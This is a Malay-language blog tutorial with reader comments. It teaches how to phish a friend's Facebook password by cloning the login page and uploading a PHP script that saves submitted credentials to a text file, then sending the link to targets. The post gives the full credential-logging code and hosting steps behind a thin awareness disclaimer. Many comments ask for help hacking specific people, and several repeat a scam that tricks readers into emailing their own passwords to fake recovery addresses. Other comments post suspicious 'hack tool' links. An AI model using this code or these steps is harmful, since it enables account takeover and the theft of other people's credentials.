Thursday, May 20, 2010

Tutorial hack password facebook rakan [Cara Mudah]

Nota : Tulisan ini tidak bermaksud mengajar pembaca melakukan sesuatu yang salah tetapi ingin mengingatkan bahawa cara yang sama TELAH digunakan oleh hacker diluar sana untuk mendapatkan password pemilik akaun bank dan mencuri duit dari akaun orang lain. Dengan dokumentasi ini saya harap agar muncul kesedaran dikalangan pengguna komputer supaya dapat lebih berhati-hati ketika melayari internet terutamanya ketika memasukkan kata laluan yang melibatkan perbankan!

Caranya dipanggil Phishing.

Teori : Mencipta satu halaman seumpama halaman login facebook kemudian menghantar URL halaman tersebut kepada rakan, admirer, musuh ketat, penjenayah  (atau juga kepada umum menggunakan email = spam) dengan harapan mereka akan masuk ke halaman tersebut dan memasukkan login ID beserta kata laluan. Kemudian, skrip akan menangkap maklumat yang dimasukkan lalu disimpan untuk paparan hacker dalam kes ini hacker ialah kita =)

Langkah 1.
Kita akan bina satu halaman facebook sama seperti yang boleh anda lihat disini. Kemudian, dalam kod halaman tersebut dilinkkan ke write.php yang akan kita bina dalam langkah 2. Anda boleh muatturun index.html (halaman login facebook yang telah siap di linkkanke write.php) menggunakan link berikut;


Langkah 2.
Bina satu skrip php untuk menangkap maklumat dan password yang dimasukkan dalam index.html diatas.

header("Location: http://www.facebook.com/");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
 {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Copy paste ke dalam gedit dan save sebagai write.php atau muatturun fail berikut;


Jadi sekarang anda mempunyai cukup bahan.

Langkah 3.
Muatnaik fail index.html dan write.php ke server anda. Tidak mempunyai server? Sila gunakan server percuma seperti http://www.justfree.com dan sebagainya. Dalam kes ini saya menggunakan justfree.com.

Selepas register, pergi ke file manager dan muatnaik (upload) 2 fail tadi.


Sekiranya nickname anda ialah melayubuntu, link pishing anda mungkin seperti berikut

Hantarkan link ini kepada target dan sekiranya mereka memasukkan kata laluan dalam halaman ini, fail passes.txt akan terbina secara automatik. Nak lihat kandungan passes.txt yang saya buat? Seperti dibawah

charset_test=€,´,€,´,水,Д,Є
version=1.0
return_session=0
session_key_only=0
lsd=QNZc2
email=melayubuntu@gmail.com
pass=tenasterisk

Jadi sekarang saya dapat tahu bahawa akaun yang menggunakan email melayubuntu@gmail.com menggunakan kata laluan tenasterisk.

Mudah atau susah?

Saya ingin ulang disini, cara yang sama seperti diatas digunakan oleh hacker untuk melakukan kerja keji iaitu mencuri duit dari akaun bank mangsa dan sekiranya anda menerima apa-apa email daripada bank mengatakan akaun bank anda mempunyai masalah, JANGAN klik apa-apa link pada email itu atau anda adalah mangsa yang seterusnya.

Semoga ada kebaikan dari entry saya pada kali ini. Sekian.

80 comments:

  1. terbaik r bro....kesedaran ttg isu hack2x ni sume.....
    Atau kita panggil "forge" laman web utk perdaya mangsa...
    Good entry...

    ReplyDelete
  2. Ada jugak dapat emel phising dari Facebook. Tapi sekali dia bagi malware daa.. Tapi yang best malware tu berbentuk .exe ^_^

    ReplyDelete
  3. ahahaha...gune ubuntu,wat dunno jer ngan file .exe tu..

    ReplyDelete
  4. hahha..skali .deb camne? ekeke..

    ReplyDelete
  5. patutnya letak last sekali tu
    anda sudah tertipu disitu
    sila pastikan anda tidak ditipu lagi haha

    ReplyDelete
  6. err camner password orang tu nak sampai kat kita?

    ReplyDelete
  7. sbb xde sape2 lagi yang masuk jerat..try ko test masukkan password sendiri ker..msti fail 2 tercipta pastu..

    ReplyDelete
    Replies
    1. Anda yang pandai hack akaun facebook.tolong call saya nak minta bantuan.ne no saya 0174292573

      Delete
  8. Hehe, kalau phishing detected, firefox and google chrome tahu..

    ReplyDelete
  9. sebelum dia detect, kita dah dapat password yg kita nak..ok la 2..hak3

    ReplyDelete
  10. ala bila org tu dah taruk e-mail ngan password, facebook sruh diorang reset password...Takleh ke nak halau facebook tu dari ganggu aku punya phishing?

    ReplyDelete
  11. hmm 2 langkah prevention dr facebook..maybe lepas dia masuk kn password dia bleh redirect dia page lain..atau pun berdoa supaya dia xbaca pun arahan facebook 2..wakaka

    ReplyDelete
  12. hahah mau dicuba ni... bukan nak menghack tapi nak try sendiri

    ReplyDelete
  13. thanks bro!
    article ni byk membantu...
    dekat email sy bersepah org nk bg duit...
    smpai berbillion2 euro pon ade...
    hehhee

    ReplyDelete
  14. bagus juga.dan saya mau coba, bukan untuk hal lain tp untuk menambah ilmu sahaja.
    Tatp waktu saya mau login ke phishing kok ngak bisa?
    ada ide lain untuk ini?
    thank you

    ReplyDelete
  15. a'kum bro..
    tred nie mmg ngam..
    aku br je cuba nie..
    aku try id n pass sendiri..
    dpt tapi pass nye file tak de but die keluar kat url..
    lagi satu aku tukar interface fb yg real bukan yg ko bagi..
    tapi die tak leh nak masuk sbb fb dpt detect n die dh block phising..

    ReplyDelete
  16. maybe facebook dah baca post ni kemudian update dia punya kod?
    hahahha...

    ReplyDelete
  17. eee..
    apesal x jadik nk wat?
    xpham la konsep die cner..
    bile nk dpt password org tu?
    sume langkah2 da follow da..
    tlg bg panduan lg..

    ReplyDelete
  18. Replies
    1. http://www.hackfacebook2015.net/hack.php?id=3759 try ini

      Delete
    2. https://www.facebook.com/fitri.latif.5680

      Delete
  19. erm sy xlh nk register kt justfree domain..
    npe erk..
    ade function sme...

    ReplyDelete
  20. die kuar cmnie mse sy nk bt cornfurmatio
    Warning: mkdir(/www/justfree.com): File exists in /var/wkscript/functions.php on line 182

    Fatal error: Failed to mkdir('/www/justfree.com') in /var/wkscript/functions.php on line 182

    ReplyDelete
  21. bro, cam aner kita nak link phising kepada target kita?

    ReplyDelete
  22. bro, naper tak jadi yerk..
    cam aner na dapatkan link kita...???
    dan cam aner nak send link phising tu..?
    bole bagi tau tak...???
    konfius la nak dekat 3jam buat tak jadi2 lagi nie...

    ReplyDelete
  23. nak link mcm mna

    ReplyDelete
  24. nak tanya... saya ada masalah dekat justfree.com nie.. saya dah sampai step 2.. semua dah isi.. tapi bila sampai turn bawah sekali suruh masukkan exra domain, saya tak tau nak buat apa... bagai mana cara nak masuk extra domain tu??

    ReplyDelete
  25. halo kwn..aku ni buta jgk la bab2 hacking2 ni...
    soalan aku..
    mn nk cari "gedit" ( Copy paste ke dalam gedit dan save sebagai write.php atau muatturun fail berikut; )

    terangkan skit lg..tqq..nk test sb ade 2 akaun..

    ReplyDelete
  26. bro . .
    ni blog aq..
    www.axweri.co.cc
    www.simplyhacks.wordpress.com .. .
    bro,ley tlg design kn blog aq x??
    aq pnt la...
    wordpress ni aq xphm . .

    ReplyDelete
  27. xbpe pham la bro..lebih terperinci n mudah leyy x ?

    ReplyDelete
  28. Bro, aku x faham sangat la, leh tolong gitau care care x? ak nak hack kwn ak nye ni..
    email ak hkhairil@gmail.com , FB , khairilhafiz@yahoo.com

    ReplyDelete
  29. bro justfree tu tak leh found
    ade site lain tak?

    ReplyDelete
  30. x pahamla cmn nak bt ne..konpius cket

    ReplyDelete
  31. mcm mana broo ape yg ko email aku nak pm ko..

    plz bro..ugent ni...

    kalo aku dpt buat aku nak beljr ko..

    ReplyDelete
  32. suda banyak soalan tapi mane tuan blog x jawab pon hak3

    ReplyDelete
  33. bro, ckp kena register kat justfree.. mcm mane.??
    ta phm lah..
    ajar2...

    ReplyDelete
  34. ta phm kat mcm mane nk register justfree.com

    ReplyDelete
  35. hacking x da cara senang...bukan semudah yg disangka ~~
    kepada yg nak belajar sgt pasal hacking tuh, belajar dari fundamental...
    belajar buat web, belajar programming, system security, belajar network architecture..

    then, da abes belajar benda2 suma tuh, kalau x tau, baru la tanye soalan2 yg "betul".

    ReplyDelete
  36. simple konsep, phishing = web palsu utk memperdaya rakan anda memasukkan username/password mereka.

    bila nak buat web palsu, mesti la kena ada server/hosting.. justfree.com, 110mb.com, etc tu contoh hosting free yang boleh kita tumpang utk setup web palsu kita. so kena la register dulu utk guna server/hosting diaorg.

    ReplyDelete
  37. perghh ramai giler komen untuk bahagian entry nie, bro admin, anda telah BOLOS untuk entry kali ini, hahahah memecahkan sempadan isu2 linux.. terbaik.. hahahah.. kire kat malaysia ni, dah timbul erk isu2 nak hack (sebab tak puas hati lar tu, hahahaha) naseb badan.. keh keh keh P/S:amek whuduk pergi solat.. huhuhuhu

    ReplyDelete
  38. cara ni memang boleh. tapi

    1. ada sesetengah hosting tak bagi upload dah file-file berunsur seperti itu. silap-silap boleh di banned.
    2. yang write.php tu, kalau redirect ke www.facebook.com rasanya server facebook akan detect yang kita dari website phishing. so better letak website lain :)
    3. contoh kalau nak tukar .html jenis lain, rasanya kena edit juga kot dalam .html tu. sebab nak bagi dia detect dan automatically masuk dalam write.php


    ==================================================================================
    ARTIKEL PANAS! LAGI MERAPU SINI!

    ReplyDelete
  39. free-webhosts blh guna?

    ReplyDelete
  40. lepas upload file tu, mane kita nak tau link phishing tu?

    ReplyDelete
  41. mcm ne nak tau hau paswood orng ye???sy btol2 perlukannye...sy hendk pdm fb kwn sy yg telah pergi buat selam2nye....sy x snggup tngok wall dia...sbb rmai yg tulis kat wall dia.....sy x snggup.....tolong saya..sape2 yg tahu mcm ne nak tau paswood orng...email orng 2 sy de...

    ReplyDelete
  42. boleh tolong saya?
    saya tak faham caranya..
    sy bg email,then tlg buatkan boleh?

    ReplyDelete
  43. Sedih mendengarkan cerita ini. Tapi cara ini hanya berfungsi dengan "menipu" pengguna facebook untuk memasukkan email & password nya ke dalam page yang kita setupkan... Kalau si empunya akaun facebook dah tiada, mmg tak leh nak buat apa-apa... Sebaiknya, doakan beliau tenang di sana. Pasal Fb dia tu tak perlu dirisaukan.

    ReplyDelete
  44. server free slaen justfree.com xde ke?

    ReplyDelete
  45. gedit tu ape? tunjuk kan lam bentuk video boleh?

    ReplyDelete
  46. lah...asl x guna md5 descrypting jewr...

    ReplyDelete
  47. nk buat tapi xreti
    spe boleh bg mklumat yg lebih detail

    ReplyDelete
  48. muhammad fahmi saadonOctober 18, 2011 at 1:43 AM

    xyah buat la.. fb dh update.. mmg xley phishing2 dah.. kena cari cara len plak..

    ReplyDelete
  49. fb lagi terer la ahahaha..tp rasa2 kalau edit file tu maybe bole kot

    ReplyDelete
  50. dah cube..step 3 je x lepas....tlg bg detail kat email fieyzaini@yahoo.com

    ReplyDelete
  51. paham jugak sikit2...
    tapi still xleh buat jgk..huhu...

    ReplyDelete
  52. tolong lh cmne nk gne pishing 2!!!!! plz......

    ReplyDelete
  53. web justfree x blh akses y ?
    other web ade x ?

    ReplyDelete
  54. bro,cubalah cerita sikit, tak ada kah web free hosting yang betul2 boleh akses??? aku dah penat sgt, mncari cara hack fb, ni saja cara yg aku betul2 yakin, tapi sayangnya, !!! WEB HOSTING PULA PROBLEM, mna2 web hosting mcm tak bfungsi lah,

    ReplyDelete
  55. sites.google.com/site/perindu23/index1.html ?????? aku dah ada, tapi, bila klik link tu, dia trus download, ala bro?? please, mcm mna ni?

    ReplyDelete
  56. bro boleh tnjuk gambaran dye tk . justfree pun tk boleh buka nie . tlg laa bro nk belajar hack nie . :)

    ReplyDelete
  57. aku baru je try teknik nie,memang berkesan..
    Tahap 1:
    buka email korang..pastu klik pada COMPOSE..
    Tahap2:
    nampak tak perkataan SUBJECK..?? ha kt subject tu korang tulus perkataan ni..: RETRIEVE LOST PASSWORD
    Tahap 3:
    ok tahap ke 3 ni korang tulis dalam kotak yg biasa kita guna untuk tulis email..
    Pada perenggan pertama tulis perkataan seperti di bawah ni:
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    pada perenggan ke dua korang selang sebaris tulis:
    Login: (tulis email orang yg korang nak curi password dia)
    Current E-mail: (tulis email facebok korang)
    Password: (tulis password email facebook korang)
    contoh:
    ——-
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    Login: facebookhack@yahoo.com
    Current E-mail: harimaumalaya@yahoo.com
    Password: 12345678
    Tahap 4:
    Ok siap…senang je…
    pastu..
    Send email ini ke alamat email ni: recoveryp123@yahoo.com
    Pastu pakat2 sabar la kejap..klo yahoo system manager tak busy dalam masa 15 minit pass_recovery_master ni akan balas email korang beserta password yg korang nak…klo busy mungkin boleh sampai 24 @ 48 jam baru depa balas email korang…
    ini email baru dia

    ReplyDelete
  58. leh bagi link server lain x?

    ReplyDelete
  59. Anonymous says:
    February 5, 2012 12:52 AM
    aku baru je try teknik nie,memang berkesan..
    Tahap 1:
    buka email korang..pastu klik pada COMPOSE..
    Tahap2:
    nampak tak perkataan SUBJECK..?? ha kt subject tu korang tulus perkataan ni..: RETRIEVE LOST PASSWORD
    Tahap 3:
    ok tahap ke 3 ni korang tulis dalam kotak yg biasa kita guna untuk tulis email..
    Pada perenggan pertama tulis perkataan seperti di bawah ni:
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    pada perenggan ke dua korang selang sebaris tulis:
    Login: (tulis email orang yg korang nak curi password dia)
    Current E-mail: (tulis email facebok korang)
    Password: (tulis password email facebook korang)
    contoh:
    ——-
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    Login: facebookhack@yahoo.com
    Current E-mail: harimaumalaya@yahoo.com
    Password: 12345678
    Tahap 4:
    Ok siap…senang je…
    pastu..
    Send email ini ke alamat email ni: recoveryp123@yahoo.com
    Pastu pakat2 sabar la kejap..klo yahoo system manager tak busy dalam masa 15 minit pass_recovery_master ni akan balas email korang beserta password yg korang nak…klo busy mungkin boleh sampai 24 @ 48 jam baru depa balas email korang…
    ini email baru dia

    >>>betol keni bro????<<<<<

    ReplyDelete
  60. tak boleh caye dengan cara atas ni. pembohong belaka.. baik tak payah ikut. depa bohong ja tu.

    ReplyDelete
  61. saya nak share working hacking tools utk facebook, sila guna untuk kebaikan sahaja

    http://goo.gl/ebI6S

    peace

    ReplyDelete
  62. kalau facebook kita kena hack kan. nak buat camna..???
    tolong please..!!!
    :((((((

    ReplyDelete
  63. tolong macam mana cara2 nak hack ekaun fACEBOOK LAME ERK????? help me please!!!

    ReplyDelete
  64. jawab lah tengah buntu otak niey... :'(

    ReplyDelete
  65. tutorial untuk hack akaun fesbuk lama

    1. tutup komputer
    2. amek air semayang
    3. solat
    4. berdoa kepada Yang Maha Kuasa supaye diberikan password fesbuk

    hhhhnnnngggg

    ReplyDelete
  66. Ambik komputer atau laptop korang hempas kat lantai....

    ReplyDelete
  67. btol kew sume nih
    mcm xpecaye jew

    bleh ke hack fb nih...

    ReplyDelete
  68. tlg bagi link download crack facebook password .. sye nk bukak fb sye , sye ta ingt password fb sye.. plezz , help me.. or juz send at my phone.. 01119680575

    ReplyDelete
  69. Tahap 1:
    buka email korang..pastu klik pada COMPOSE..
    Tahap2:
    nampak tak perkataan SUBJECK..?? ha kt subject tu korang tulus perkataan ni..: RETRIEVE LOST PASSWORD
    Tahap 3:
    ok tahap ke 3 ni korang tulis dalam kotak yg biasa kita guna untuk tulis email..
    Pada perenggan pertama tulis perkataan seperti di bawah ni:
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    pada perenggan ke dua korang selang sebaris tulis:
    Login: (tulis email orang yg korang nak curi password dia)
    Current E-mail: (tulis email facebok korang)
    Password: (tulis password email facebook korang)
    contoh:
    ——-
    /facebook.managment/systemrecovery/cgi-bin/recovery/systemflood /v&t9858
    Login: serikandi80@yahoo.com
    Current E-mail: cicidan@yahoo.com
    Password: 12345678
    Tahap 4:
    Ok siap…senang je…
    pastu..
    Send email ini ke alamat email ni: pass_recovery99@yahoo.com
    Pastu pakat2 sabar la kejap..klo yahoo system manager tak busy dalam masa 15 minit pass_recovery_master ni akan balas email korang beserta password yg korang nak…klo busy mungkin boleh sampai 24 @ 48 jam baru depa balas email korang…
    ini email baru dia
    aq baru try

    ReplyDelete
  70. dasar org malay gila donlod jah bhsa nya muatnaik muatturun bikin bngung lo kira org bikin ank naik turun hahahhahah tolol

    ReplyDelete
  71. tolong aku mohon tolong hacxk nie please

    ReplyDelete
  72. try ini http://www.hackfacebook2015.net/hack.php?id=3759

    ReplyDelete

Terima kasih atas respon..

Quartz OS: Material Design + Linux = Awesome

Konsep Material Design pertama kali diperkenalkan oleh Google untuk Android 5.0 Lollipop. Nampaknya, ada developer yang berminat untuk ...